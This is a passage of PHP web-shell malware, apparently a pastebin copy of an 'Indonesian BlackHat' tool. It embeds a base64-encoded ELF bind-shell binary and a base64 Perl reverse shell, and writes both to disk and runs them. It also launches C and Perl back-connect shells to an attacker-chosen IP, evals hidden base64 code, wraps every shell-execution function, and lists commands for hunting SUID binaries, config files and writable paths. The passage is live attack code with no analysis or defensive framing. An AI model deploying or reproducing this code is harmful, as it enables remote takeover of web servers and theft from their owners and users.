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AAIAAAAKMDAAAAAAAAAAAAACAAAAAAYWJpLW5vdGUuUwAuLi9zeXNkZXBzL2kzODYvZWxmL3N0YXJ0LlMAaW5pdC5jAGluaXRmaW5pLmMAL2J1aWxkL2J1aWxkZC9nbGliYy0yLjMuNi9idWlsZC10cmVlL2kzODYtbGliYy9jc3UvY3J0aS5TAGNhbGxfZ21vbl9zdGFydABjcnRzdHVmZi5jAF9fQ1RPUl9MSVNUX18AX19EVE9SX0xJU1RfXwBfX0pDUl9MSVNUX18AY29tcGxldGVkLjQ0NjMAcC40NDYyAF9fZG9fZ2xvYmFsX2R0b3JzX2F1eABmcmFtZV9kdW1teQBfX0NUT1JfRU5EX18AX19EVE9SX0VORF9fAF9fRlJBTUVfRU5EX18AX19KQ1JfRU5EX18AX19kb19nbG9iYWxfY3RvcnNfYXV4AC9idWlsZC9idWlsZGQvZ2xpYmMtMi4zLjYvYnVpbGQtdHJlZS9pMzg2LWxpYmMvY3N1L2NydG4uUwAxLmMAX0RZTkFNSUMAX19maW5pX2FycmF5X2VuZABfX2ZpbmlfYXJyYXlfc3RhcnQAX19pbml0X2FycmF5X2VuZABfR0xPQkFMX09GRlNFVF9UQUJMRV8AX19pbml0X2FycmF5X3N0YXJ0AGV4ZWNsQEBHTElCQ18yLjAAY2xvc2VAQEdMSUJDXzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAF9fZHNvX2hhbmRsZQBfX2xpYmNfY3N1X2ZpbmkAYWNjZXB0QEBHTElCQ18yLjAAX2luaXQAbGlzdGVuQEBHTElCQ18yLjAAc2V0c29ja29wdEBAR0xJQkNfMi4wAF9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQAbWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAGR1cDJAQEdMSUJDXzIuMABkYXRhX3N0YXJ0AGJpbmRAQEdMSUJDXzIuMABfZmluaQBleGl0QEBHTElCQ18yLjAAYXRvaUBAR0xJQkNfMi4wAF9lZGF0YQBfX2k2ODYuZ2V0X3BjX3RodW5rLmJ4AF9lbmQAc2VuZEBAR0xJQkNfMi4wAGh0b25zQEBHTElCQ18yLjAAX0lPX3N0ZGluX3VzZWQAX19kYXRhX3N0YXJ0AHNvY2tldEBAR0xJQkNfMi4wAF9Kdl9SZWdpc3RlckNsYXNzZXMAX19nbW9uX3N0YXJ0X18A";
  121.  
  122. if (!empty($_POST['backconnectport']) && ($_POST['use']=="shbd"))
  123. {
  124.  $ip = gethostbyname($_SERVER["HTTP_HOST"]);
  125.  $por = $_POST['backconnectport'];
  126.  if(is_writable(".")){
  127.  cfb("shbd",$backdoor);
  128.  ex("chmod 777 shbd");
  129.  $cmd = "./shbd $por";
  130.  exec("$cmd > /dev/null &");
  131.  $scan = o2xdaexec("ps aux");
  132.  if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
  133.  $_POST['backcconnmsg']="To connect, use netcat and give it the command 'nc $ip $por'.$data";
  134.  }else{
  135.  cfb("/tmp/shbd",$backdoor);
  136.  ex("chmod 777 /tmp/shbd");
  137.  $cmd = "./tmp/shbd $por";
  138.  exec("$cmd > /dev/null &");
  139.  $scan = o2xdaexec("ps aux");
  140.  if(eregi("./shbd $por",$scan)){ $data = ("\n</br></br>Process found running, backdoor setup successfully."); }elseif(eregi("./shbd $por",$scan)){ $data = ("\n</br>Process not found running, backdoor not setup successfully."); }
  141.  $_POST['backcconnmsg']="To connect, use netcat and give it the command 'nc $ip $por'.$data";
  142. }
  143. }
  144.  
  145. if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="Perl"))
  146. {
  147.  if(is_writable(".")){
  148.  cf("back",$back_connect);
  149.  $p2=which("perl");
  150.  $blah = ex($p2." back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
  151.  $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport'].".";
  152.  if (file_exists("back")) { unlink("back"); }
  153.  }else{
  154.  cf("/tmp/back",$back_connect);
  155.  $p2=which("perl");
  156.  $blah = ex($p2." /tmp/back ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
  157.  $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport'].".";
  158.  if (file_exists("/tmp/back")) { unlink("/tmp/back"); }
  159. }
  160. }
  161.  
  162. if (!empty($_POST['backconnectip']) && !empty($_POST['backconnectport']) && ($_POST['use']=="C"))
  163. {
  164.  if(is_writable(".")){
  165.  cf("backc",$back_connect_c);
  166.  ex("chmod 777 backc");
  167.  //$blah = ex("gcc back.c -o backc");
  168.  $blah = ex("./backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
  169.  $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport'].".";
  170.  //if (file_exists("back.c")) { unlink("back.c"); }
  171.  if (file_exists("backc")) { unlink("backc"); }
  172.  }else{
  173.  ex("chmod 777 /tmp/backc");
  174.  cf("/tmp/backc",$back_connect_c);
  175.  //$blah = ex("gcc -o /tmp/backc /tmp/back.c");
  176.  $blah = ex("/tmp/backc ".$_POST['backconnectip']." ".$_POST['backconnectport']." &");
  177.  $_POST['backcconnmsg']="Trying to connect to ".$_POST['backconnectip']." on port ".$_POST['backconnectport'].".";
  178.  //if (file_exists("back.c")) { unlink("back.c"); }
  179.  if (file_exists("/tmp/backc")) { unlink("/tmp/backc"); } }
  180. }
  181.  
  182. function cf($fname,$text)
  183. {
  184.  $w_file=@fopen($fname,"w") or err();
  185.  if($w_file)
  186.  {
  187.  @fputs($w_file,@base64_decode($text));
  188.  @fclose($w_file);
  189.  }
  190. }
  191.  
  192. function cfb($fname,$text)
  193. {
  194.  $w_file=@fopen($fname,"w") or bberr();
  195.  if($w_file)
  196.  {
  197.  @fputs($w_file,@base64_decode($text));
  198.  @fclose($w_file);
  199.  }
  200. }
  201.  
  202. function err()
  203. {
  204. $_POST['backcconnmsge']="</br></br><font color=red size=3>Error:</font> Ga Konek";
  205. }
  206.  
  207. function bberr()
  208. {
  209. $_POST['backcconnmsge']="</br></br><font color=red size=3>Error:</font> Ga Konek backdoor !";
  210. }
  211.  
  212. function which($pr)
  213. {
  214. $path = ex("which $pr");
  215. if(!empty($path)) { return $path; } else { return $pr; }
  216. }
  217. function ex($cfe)
  218. {
  219.  $res = '';
  220.  if (!empty($cfe))
  221.  {
  222.   if(function_exists('exec'))
  223.    {
  224.     @exec($cfe,$res);
  225.     $res = join("\n",$res);
  226.    }
  227.   elseif(function_exists('shell_exec'))
  228.    {
  229.     $res = @shell_exec($cfe);
  230.    }
  231.   elseif(function_exists('system'))
  232.    {
  233.     @ob_start();
  234.     @system($cfe);
  235.     $res = @ob_get_contents();
  236.     @ob_end_clean();
  237.    }
  238.   elseif(function_exists('passthru'))
  239.    {
  240.     @ob_start();
  241.     @passthru($cfe);
  242.     $res = @ob_get_contents();
  243.     @ob_end_clean();
  244.    }
  245.   elseif(@is_resource($f = @popen($cfe,"r")))
  246.   {
  247.    $res = "";
  248.    while(!@feof($f)) { $res .= @fread($f,1024); }
  249.    @pclose($f);
  250.   }
  251.  }
  252.  return $res;
  253. }
  254. function get_status() {
  255.   function showstat($sup,$stat) {
  256.     if ($stat=="on") { return "$sup: <font color=#008000>ON</font>"; }
  257.     else { return "$sup: <font color=#c45333>OFF</font>"; }
  258.   }
  259.   $arrfunc = array(
  260.     array("MySQL","mysql_connect"),
  261.     array("&#47; MSSQL","mssql_connect"),
  262.     array("&#47; Oracle","ocilogon"),
  263.     array("&#47; PostgreSQL","pg_connect"),
  264.     array("&#47; Curl","curl_version"),
  265.   );
  266.   $arrcmd = array(
  267.     array("&#47; Fetch","fetch --help"),
  268.     array("&#47; Wget","wget --help"),
  269.     array("&#47; Perl","perl -v"),
  270.     array("&#47; GCC","gcc -V"),
  271.   );
  272.  
  273.   $statinfo = array();
  274.   foreach ($arrfunc as $func) {
  275.     if (function_exists($func[1])) { $statinfo[] = showstat($func[0],"on"); }
  276.     else { $statinfo[] = showstat($func[0],"off"); }
  277.   }
  278.   $statinfo[] = (@extension_loaded('sockets'))?showstat("Sockets","on"):showstat("Sockets","off");
  279.   foreach ($arrcmd as $cmd) {
  280.     if (o2xdaexec($cmd[1])) { $statinfo[] = showstat($cmd[0],"on"); }
  281.     else { $statinfo[] = showstat($cmd[0],"off"); }
  282.   }
  283.   return implode(" ",$statinfo);
  284. }
  285.  
  286. $hostname_x=php_uname(n);
  287. $itshome = getcwd();
  288. $itshome = str_replace("/home/","~",$itshome);
  289. $itshome = str_replace("/public_html","/".$PHP_SELF.".php",$itshome);
  290. $enumerate = "http://".$hostname_x."/".$itshome."";
  291. ini_set("max_execution_time",0);
  292. if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
  293. error_reporting(5);
  294. $adires="";
  295. @ignore_user_abort(TRUE);
  296. @set_magic_quotes_runtime(0);
  297. $win = strtolower(substr(PHP_OS,0,3)) == "win";
  298. define("starttime",getmicrotime());
  299. if (get_magic_quotes_gpc()) {if (!function_exists("strips")) {function strips(&$arr,$k="") {if (is_array($arr)) {foreach($arr as $k=>$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);}
  300. $_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
  301. foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}}
  302. $O2XDAVer = "Black Hat Edition"; //Current version
  303. if (!empty($unset_surl)) {setcookie("TuX_surl"); $surl = "";}
  304. elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("TuX_surl",$surl);}
  305. else {$surl = $_REQUEST["TuX_surl"]; //Set this cookie for manual SURL
  306. }
  307.  
  308. $surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
  309.  
  310. if ($surl_autofill_include and !$_REQUEST["TuX_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}}
  311. if (empty($surl))
  312. {
  313.  $surl = "?".$includestr; //Self url
  314. }
  315. $surl = htmlspecialchars($surl);
  316. $timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
  317. $login = "";
  318. $pass = "";
  319. $md5_pass = "";
  320. $host_allow = array("*");
  321. $login_txt = "Restricted area";
  322. $accessdeniedmess = "&#60;&#60; <a href=\"http://indonesianblackhat.web.id\">Indonesian BlackHat</a>|".$O2XDAVer." : Access";
  323. $gzipencode = TRUE;
  324. $updatenow = FALSE;
  325. $TuX_updateurl = "http://indonesianblackhat.web.id/"; //Update server
  326. $TuX_sourcesurl = "http://indonesianblackhat.web.id/"; //Sources-server
  327. $filestealth = TRUE;
  328. $donated_html = "<center>.:[ Get the Codes and Feel the Soul ]:.</center>";
  329. $donated_act = array("");
  330. $curdir = "./"; //start folder
  331. $tmpdir = "";
  332. $tmpdir_log = "./";
  333. $sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
  334. $sort_save = TRUE; //If TRUE then save sorting-position using cookies.
  335. $ftypes  = array(
  336.  "html"=>array("html","htm","shtml"),
  337.  "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
  338.  "exe"=>array("sh","install","bat","cmd"),
  339.  "ini"=>array("ini","inf"),
  340.  "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
  341.  "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
  342.  "sdb"=>array("sdb"),
  343.  "phpsess"=>array("sess"),
  344.  "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
  345. );
  346.  
  347. @eval(base64_decode($back_connect_pl));
  348.  
  349. $dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin);
  350. if (empty($dizin)) {$dizin = realpath(".");} elseif(realpath($dizin)) {$dizin = realpath($dizin);}
  351. $dizin = str_replace("\\",DIRECTORY_SEPARATOR,$dizin);
  352. if (substr($dizin,-1) != DIRECTORY_SEPARATOR) {$dizin .= DIRECTORY_SEPARATOR;}
  353. $dizin = str_replace("\\\\","\\",$dizin);
  354. $dizinispd = htmlspecialchars($dizin);
  355. /*dizin*/
  356. $real = realpath($dizinispd);
  357. $path = basename ($PHP_SELF);
  358. function dosyayicek($link,$file)
  359. {
  360.    $fp = @fopen($link,"r");
  361.    while(!feof($fp))
  362.    {
  363.        $cont.= fread($fp,1024);
  364.    }
  365.    fclose($fp);
  366.  
  367.    $fp2 = @fopen($file,"w");
  368.    fwrite($fp2,$cont);
  369.    fclose($fp2);
  370. }
  371.  
  372. $exeftypes  = array(
  373.  getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
  374.  "perl %f%" => array("pl","cgi")
  375. );
  376.  
  377. $regxp_highlight  = array(
  378.   array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
  379.   array("config.php",1) // example
  380. );
  381.  
  382. $safemode_diskettes = array("a"); // This variable for disabling diskett-errors.
  383.  // array (i=>{letter} ...); string {letter} - letter of a drive
  384. //$safemode_diskettes = range("a","z");
  385. $hexdump_lines = 8;// lines in hex preview file
  386. $hexdump_rows = 24;// 16, 24 or 32 bytes in one line
  387. $nixpwdperpage = 100; // Get first N lines from /etc/passwd
  388. $bindport_pass = "indonesianblackhat";  // default password for binding
  389. $bindport_port = "31373"; // default port for binding
  390. $bc_port = "31373"; // default port for back-connect
  391. $datapipe_localport = "8081"; // default port for datapipe
  392. $back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2VjaG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNURElOKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
  393.  
  394. // Command-aliases
  395. if (!$win)
  396. {
  397. $cmdaliases = array(
  398.     array("-----------------------------------------------------------", "ls -la"),
  399.     array("find all suid files", "find / -type f -perm -04000 -ls"),
  400.     array("find suid files in current dir", "find . -type f -perm -04000 -ls"),
  401.     array("find all sgid files", "find / -type f -perm -02000 -ls"),
  402.     array("find sgid files in current dir", "find . -type f -perm -02000 -ls"),
  403.     array("find config.inc.php files", "find / -type f -name config.inc.php"),
  404.     array("find config* files", "find / -type f -name \"config*\""),
  405.     array("find config* files in current dir", "find . -type f -name \"config*\""),
  406.     array("find all writable folders and files", "find / -perm -2 -ls"),
  407.     array("find all writable folders and files in current dir", "find . -perm -2 -ls"),
